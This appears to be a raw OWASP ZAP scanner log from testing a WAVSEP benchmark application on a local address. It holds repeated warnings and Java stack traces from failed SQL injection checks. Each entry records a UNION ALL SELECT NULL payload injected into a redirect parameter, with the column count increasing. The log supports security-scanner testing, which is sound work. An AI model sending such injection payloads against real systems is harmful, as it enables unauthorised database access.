redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680770 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680771 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680772 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680772 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680773 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680773 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680774 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680774 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680775 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680776 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680777 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680777 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 